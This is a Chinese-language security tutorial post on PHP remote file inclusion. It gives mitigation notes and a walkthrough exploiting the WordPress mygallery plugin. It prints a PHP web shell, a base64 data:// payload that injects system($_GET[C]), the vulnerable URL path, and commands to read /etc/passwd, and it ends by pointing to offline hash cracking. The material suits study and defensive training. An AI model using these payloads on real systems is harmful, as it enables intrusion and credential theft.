相关阅读
data-postsbox="{"id":17739,"title":"【视频讲解】黑客常用的远程命令执行实战及演示","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":4498,"comment_count":5,"category":"knowledge","is_forum_post":false}">{"id":17739,"title":"【视频讲解】黑客常用的远程命令执行实战及演示","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":4498,"comment_count":5,"category":"knowledge","is_forum_post":false}
data-postsbox="{"id":246,"title":"【DVWA全攻略】DVWA File Inclusion实验","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":2839,"comment_count":1,"category":"cybersecurity","is_forum_post":false}">{"id":246,"title":"【DVWA全攻略】DVWA File Inclusion实验","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":2839,"comment_count":1,"category":"cybersecurity","is_forum_post":false}
data-postsbox="{"id":3073,"title":"【零基础学渗透】系统层基础与常见命令的学习","author":"Sec-Labs","author_id":10015,"cover_image":"","cover_video":"","views":2624,"comment_count":259,"category":"cybersecurity","is_forum_post":false}">{"id":3073,"title":"【零基础学渗透】系统层基础与常见命令的学习","author":"Sec-Labs","author_id":10015,"cover_image":"","cover_video":"","views":2624,"comment_count":259,"category":"cybersecurity","is_forum_post":false}
视频讲解
今天我们将大家了解如何通过url访问路径,构造远程文件包含(Remote File Inclusion)漏洞。
通常文件包含会配合命令执行,通过访问一个url,我们就可以看到譬如服务器的密码、当前文件目录下有哪些其他文件,是不是听起来还蛮有意思的?
与此同时,我们还将在视频中讲解教大家使用wpscan去扫描wordpress插件漏洞,然后配合exploit-db来查找可以注入的位置,最终完成对wordpress的文件包含漏洞利用。
图文讲解
通常情况下,文件包含产生原因是 PHP 语言在通过引入文件时,引用的文件名,用户可控,由于传入的文件名没有经过合理的校验,或者校验被绕过,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。
当被包含的文件在服务器本地时,就形成的本地文件包含漏洞。
相关笔记
- 禁止远程文件包含
allow_url_include=off - 配置
open_basedir=指定目录,限制访问区域。 - 过滤
../等特殊符号 - 修改Apache日志文件的存放地址
- 开启魔术引号
magic_quotes_qpc=on - 尽量不要使用动态变量调用文件,直接写要包含的文件。
视频中的案例
视频中是发现了wordpress中的mygallery插件存在远程文件包含(RFI)漏洞
其url路径为
/mygallery/myfunctions/mygallerybrowser.php?myPath=
在myPath=后面就可以接一个其他服务器的文件地址,然后就可以进行命令执行等相关操作了
但是你可能会有疑惑,这样的后门文件去哪里找呢?
视频中是通过下面的命令来寻找kali提供的php后门文件,通过管道输出php文件
locate backdoor | grep php
最终选择了最后一个simple-backdoor.php
简单讲解一下代码,下面代码会接收你在url里传入的?cmd参数的值,然后使用system执行并打印命令结果
if (isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = $_REQUEST['cmd'];
system($cmd);
echo "</pre>";
die;
}
视频中先尝试了将cmd设置为ls,即&cmd=ls
然后我们可以看到文件包含是成功的,因为输出了当前目录下所有文件信息
当然,我们之前还学过ls -l的命令,可以显示文件权限、大小、修改日期等信息,这里只需要将ls -l进行url编码,也就是空格编码成了%20
然后回车,我们可以看到信息变得更加详细了
为什么说Linux命令这么重要,这里就得以体现了,你还可以进行更多的操作
data-postsbox="{"id":3073,"title":"【零基础学渗透】系统层基础与常见命令的学习","author":"Sec-Labs","author_id":10015,"cover_image":"","cover_video":"","views":2624,"comment_count":259,"category":"cybersecurity","is_forum_post":false}">{"id":3073,"title":"【零基础学渗透】系统层基础与常见命令的学习","author":"Sec-Labs","author_id":10015,"cover_image":"","cover_video":"","views":2624,"comment_count":259,"category":"cybersecurity","is_forum_post":false}
我们还尝试查看服务器的一些用户密码,使用cat /etc/passwd,同样将空格转成%20,输入就变成了
之后就可以看到结果了
后续的利用你可以参考之前我们讲解的hashcat,离线破解密码
data-postsbox="{"id":5494,"title":"【视频教程】如何高效、优雅地破解密码?hydra、Hashcat你值得拥有!","author":"FancyPig","author_id":1,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2021/12/20211218022439993.png","cover_video":"","views":5287,"comment_count":167,"category":"cybersecurity","is_forum_post":false}">{"id":5494,"title":"【视频教程】如何高效、优雅地破解密码?hydra、Hashcat你值得拥有!","author":"FancyPig","author_id":1,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2021/12/20211218022439993.png","cover_video":"","views":5287,"comment_count":167,"category":"cybersecurity","is_forum_post":false}
常见疑惑:图片中的base64编码是干啥的?
先使用了base64编码了下面的代码
<?php system($_GET[C]); ?>
编码后为
PD9waHAgc3lzdGVtKCRfR0VUW0NdKTsgPz4=
然后作者将其添加到base64编码,即myPath=data://text/plain;base64,的后面
myPath=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW0NdKTsgPz4=
目的就是再增加一个输入的参数c,这也就是为什么后面我们把cat /etc/passwd写在了&c=后面